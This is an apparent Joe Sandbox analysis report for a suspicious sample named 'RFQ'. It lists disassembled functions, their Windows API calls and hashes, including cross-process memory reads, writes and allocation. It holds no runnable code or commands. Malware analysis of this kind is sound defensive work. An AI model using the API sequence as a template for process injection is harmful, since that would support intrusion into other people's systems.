• Instruction Fuzzy Hash: B041A274A00209DFCF05EFA4C885AADB7B5FF49344F14C469E91AAB292DB38DD45CB50
APIs
  • Part of subcall function 0077430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0076BC08,?,?,00000034,00000800,?,00000034), ref: 00774335
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0076C1D3
  • Part of subcall function 007742D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0076BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00774300
  • Part of subcall function 0077422F: GetWindowThreadProcessId.USER32(?,?), ref: 0077425A
  • Part of subcall function 0077422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0076BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0077426A
  • Part of subcall function 0077422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0076BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00774280
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0076C240
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0076C28D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
• String ID: @
• API String ID: 4150878124-2766056989
• Opcode ID: b29aae8868f901b5a757f13941d89ec2e670ce7a6c7e276f1330b4c241ae947f
                                                                                                                                                    • Instruction ID: 341f2f3459125e8b5befb1cbf6b6187d8abc223a90372989f99bf1aeb625db4b
                                                                                                                                                    • Opcode Fuzzy Hash: b29aae8868f901b5a757f13941d89ec2e670ce7a6c7e276f1330b4c241ae947f
                                                                                                                                                    • Instruction Fuzzy Hash: C4414B72900218AFDF11DFA4CC95AEEB7B8BF09740F008095FA8AB7181DB756E55CB61
                                                                                                                                                    APIs
                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,007CDC00,00000000,?,?,?,?), ref: 0079A6D8
                                                                                                                                                    • GetWindowLongW.USER32 ref: 0079A6F5
                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0079A705
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Long
                                                                                                                                                    • String ID: SysTreeView32
                                                                                                                                                    • API String ID: 847901565-1698111956
                                                                                                                                                    • Opcode ID: 3cd6828b9416fd4537172cb426c0e6aa951f90cc8ea7ab71956acf864b45bebe
                                                                                                                                                    • Instruction ID: 2b625a113eec3d093c83525f685cbfa525339fd029c3dc843d499446443b038a
                                                                                                                                                    • Opcode Fuzzy Hash: 3cd6828b9416fd4537172cb426c0e6aa951f90cc8ea7ab71956acf864b45bebe
                                                                                                                                                    • Instruction Fuzzy Hash: 4331C031201609ABDF218E78DC45BE677A9EB49324F254724F875932E0D738AC508B91
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 00785190
                                                                                                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 007851C6
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CrackInternet_memset
                                                                                                                                                    • String ID: |$Dx
                                                                                                                                                    • API String ID: 1413715105-3259052687
                                                                                                                                                    • Opcode ID: 65d602d612b2c6041c00073550e6d6a6abba4b71143ba19fb0cc10c47624d911
                                                                                                                                                    • Instruction ID: ce963a30745149f3cf4a74647164678fb9498cc99ea5e5796b8435ab9fb912d1
                                                                                                                                                    • Opcode Fuzzy Hash: 65d602d612b2c6041c00073550e6d6a6abba4b71143ba19fb0cc10c47624d911
                                                                                                                                                    • Instruction Fuzzy Hash: 49310971C00119EBDF11EFA4CC89AEEBFB9FF18710F104015E815B6166EA35A956DBA0
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0079A15E
                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0079A172
                                                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 0079A196
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Window
                                                                                                                                                    • String ID: SysMonthCal32
                                                                                                                                                    • API String ID: 2326795674-1439706946
                                                                                                                                                    • Opcode ID: cd3edd5c60458561d87374d6d509d2ec5b14dea2be49e10bd97737c99f71224e
                                                                                                                                                    • Instruction ID: 1f8a62ab96a21e70c3ab3fb72902ec2ede1c2fc6529d379c762d4ada6f91db9d
                                                                                                                                                    • Opcode Fuzzy Hash: cd3edd5c60458561d87374d6d509d2ec5b14dea2be49e10bd97737c99f71224e
                                                                                                                                                    • Instruction Fuzzy Hash: E321BF32540218BBDF218F94DC46FEA3B79EF48754F110214FE55AB1D0D6B9AC50CB94
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0079A941
                                                                                                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0079A94F
                                                                                                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0079A956
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$DestroyWindow
                                                                                                                                                    • String ID: msctls_updown32
                                                                                                                                                    • API String ID: 4014797782-2298589950
                                                                                                                                                    • Opcode ID: cfe92fb80187b01a1ef09a81ae3d50aebe360307f0615332b7bc787dab61a347
                                                                                                                                                    • Instruction ID: 229e694a1ed70311d21f6bdadddc43d9e1dcbd4c18b2664107387341dd44aa84
                                                                                                                                                    • Opcode Fuzzy Hash: cfe92fb80187b01a1ef09a81ae3d50aebe360307f0615332b7bc787dab61a347
                                                                                                                                                    • Instruction Fuzzy Hash: 69217CB5601209BFEF11DF18DC81DB737ADEB5A3A8B450159FA049B261DB38EC11CAA1
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00799A30
                                                                                                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00799A40
                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00799A65
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$MoveWindow
                                                                                                                                                    • String ID: Listbox
                                                                                                                                                    • API String ID: 3315199576-2633736733
                                                                                                                                                    • Opcode ID: d609509b759d3c74e4b604e6e1eb806ff32585bc6c4638bb1488029ef1218ae2
                                                                                                                                                    • Instruction ID: c19fbca92ccc067608a0b8dc2904296f0d10477c00557d9799e29316cc9e9196
                                                                                                                                                    • Opcode Fuzzy Hash: d609509b759d3c74e4b604e6e1eb806ff32585bc6c4638bb1488029ef1218ae2
                                                                                                                                                    • Instruction Fuzzy Hash: 6721C532610118BFEF218F58DC85FBF3BAAEF89764F018129FA4497190C679AC51C7A0
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0079A46D
                                                                                                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0079A482
                                                                                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0079A48F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID: msctls_trackbar32
                                                                                                                                                    • API String ID: 3850602802-1010561917
                                                                                                                                                    • Opcode ID: 04aa286a09ed3090c12dfc60edd63ceee69b96c124d02e761cc7b743101cabba
                                                                                                                                                    • Instruction ID: fe806ade6cd255e6ad8c84af8c50e284d150142f923bbd0648041a39b0879a56
                                                                                                                                                    • Opcode Fuzzy Hash: 04aa286a09ed3090c12dfc60edd63ceee69b96c124d02e761cc7b743101cabba
                                                                                                                                                    • Instruction Fuzzy Hash: 19110A71200248BEEF209F69DC49FAB3769FF88754F014118FA45960A1D6BAE811D764
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00752350,?), ref: 007522A1
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 007522A8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: RoInitialize$combase.dll
                                                                                                                                                    • API String ID: 2574300362-340411864
                                                                                                                                                    • Opcode ID: 48f984fb99970e3aac8760c59384031ae8fd868dc881a46ddb10bdf4a3976c70
                                                                                                                                                    • Instruction ID: 201c925d05ced6655a4fa0ba625e3fa139728f6c350206a0e5096c0c4650f651
                                                                                                                                                    • Opcode Fuzzy Hash: 48f984fb99970e3aac8760c59384031ae8fd868dc881a46ddb10bdf4a3976c70
                                                                                                                                                    • Instruction Fuzzy Hash: 52E01A74690309ABDB205F70EC89BA83765B705706F50C430B102E51A1EBBD5845DF4C
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00752276), ref: 00752376
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0075237D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: RoUninitialize$combase.dll
                                                                                                                                                    • API String ID: 2574300362-2819208100
                                                                                                                                                    • Opcode ID: 9ae0962be51b37a6b42090930cc16ab7775e123f9e3e2cc05dffce2d4f6b6dcb
                                                                                                                                                    • Instruction ID: 12c3f955a61ccf64588ec826e75cb23b36056a2562b47f50be4bb5beb81caa39
                                                                                                                                                    • Opcode Fuzzy Hash: 9ae0962be51b37a6b42090930cc16ab7775e123f9e3e2cc05dffce2d4f6b6dcb
                                                                                                                                                    • Instruction Fuzzy Hash: 4BE0B6B4549308ABDB305F60ED4DFA93B65B706706F118424F509E62B1FBBC5815CA5C
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LocalTime__swprintf
                                                                                                                                                    • String ID: %.3d$WIN_XPe
                                                                                                                                                    • API String ID: 2070861257-2409531811
                                                                                                                                                    • Opcode ID: 5a686dff1bee95d1d2383d1730b0f8f2a6b771f6762b8ec77cb8e093f99e0f09
                                                                                                                                                    • Instruction ID: 68573461fcd8e390220dcd040b83a858eae37602ad7cebc3808f3b556dfdcc6a
                                                                                                                                                    • Opcode Fuzzy Hash: 5a686dff1bee95d1d2383d1730b0f8f2a6b771f6762b8ec77cb8e093f99e0f09
                                                                                                                                                    • Instruction Fuzzy Hash: 1FE012B1805658FBDB109B50CD49EF973BCE749752F5005D2B946E1100E73D9B84EB32
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,007921FB,?,007923EF), ref: 00792213
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00792225
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: GetProcessId$kernel32.dll
                                                                                                                                                    • API String ID: 2574300362-399901964
                                                                                                                                                    • Opcode ID: 1f6d74b26f28bd9506d4650a786c46deebdfc24abde8698db593c4ecd055bd9b
                                                                                                                                                    • Instruction ID: ecd96db4215dfd6470ff95d5587bf84908057617bf17f69c880d25062429ec92
                                                                                                                                                    • Opcode Fuzzy Hash: 1f6d74b26f28bd9506d4650a786c46deebdfc24abde8698db593c4ecd055bd9b
                                                                                                                                                    • Instruction Fuzzy Hash: 83D0A77440071AAFCB355F36FC0CB0176E9FB08300B02842DE841E2251EB7CDC818650
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,007342EC,?,007342AA,?), ref: 00734304
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00734316
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                    • API String ID: 2574300362-1355242751
                                                                                                                                                    • Opcode ID: 8237e003ec0c83c2b1e6f6813a8b2f500cdb5a5a3d3e033e912313973b89cc0f
                                                                                                                                                    • Instruction ID: 28047d916189ed0259e54ce128443dd4e090d24777cf0e646647261fca112a6b
                                                                                                                                                    • Opcode Fuzzy Hash: 8237e003ec0c83c2b1e6f6813a8b2f500cdb5a5a3d3e033e912313973b89cc0f
                                                                                                                                                    • Instruction Fuzzy Hash: 59D0A7704007169FD7345F65EC0CB0176E8AB08301F01842DE441E3163EBBCDC808610
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,007341BB,00734341,?,0073422F,?,007341BB,?,?,?,?,007339FE,?,00000001), ref: 00734359
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0073436B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                    • API String ID: 2574300362-3689287502
                                                                                                                                                    • Opcode ID: fd496ddaca61203f0b6dd7b5411b32bc24b40f1bb2f98606bad8f302216a62e5
                                                                                                                                                    • Instruction ID: 8cb6cc195307cbae85174196100cd16f350f0cfb726f425c5827ee31c1f87ed9
                                                                                                                                                    • Opcode Fuzzy Hash: fd496ddaca61203f0b6dd7b5411b32bc24b40f1bb2f98606bad8f302216a62e5
                                                                                                                                                    • Instruction Fuzzy Hash: C4D0A7704007169FE7344F35EC0CB017AD8BB15715F01852DE4C1E3151EBBCEC808610
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0077052F,?,007706D7), ref: 00770572
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00770584
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                                                                                    • API String ID: 2574300362-1587604923
                                                                                                                                                    • Opcode ID: c05beb42eb66e2ac536e393f9d5f388816158846bbff3af3392e9ec32368e142
                                                                                                                                                    • Instruction ID: 2f69495df5756b88f2c166083d225ef927df8f12f800faf95e6bba453618802d
                                                                                                                                                    • Opcode Fuzzy Hash: c05beb42eb66e2ac536e393f9d5f388816158846bbff3af3392e9ec32368e142
                                                                                                                                                    • Instruction Fuzzy Hash: 38D05E704003169ACB305F25A808F0277E8AB08300B11C529E84592190E6BCC8818B60
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(oleaut32.dll,?,0077051D,?,007705FE), ref: 00770547
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00770559
                                                                                                                                                    Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RegisterTypeLibForUser$oleaut32.dll
• API String ID: 2574300362-1071820185
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,0078ECBE,?,0078EBBB), ref: 0078ECD6
• GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0078ECE8
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetSystemWow64DirectoryW$kernel32.dll
• API String ID: 2574300362-1816364905
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,00000000,0078BAD3,00000001,0078B6EE,?,007CDC00), ref: 0078BAEB
• GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0078BAFD
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetModuleHandleExW$kernel32.dll
• API String ID: 2574300362-199464113
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,?,00793BD1,?,00793E06), ref: 00793BE9
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00793BFB
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 2574300362-4033151799
APIs
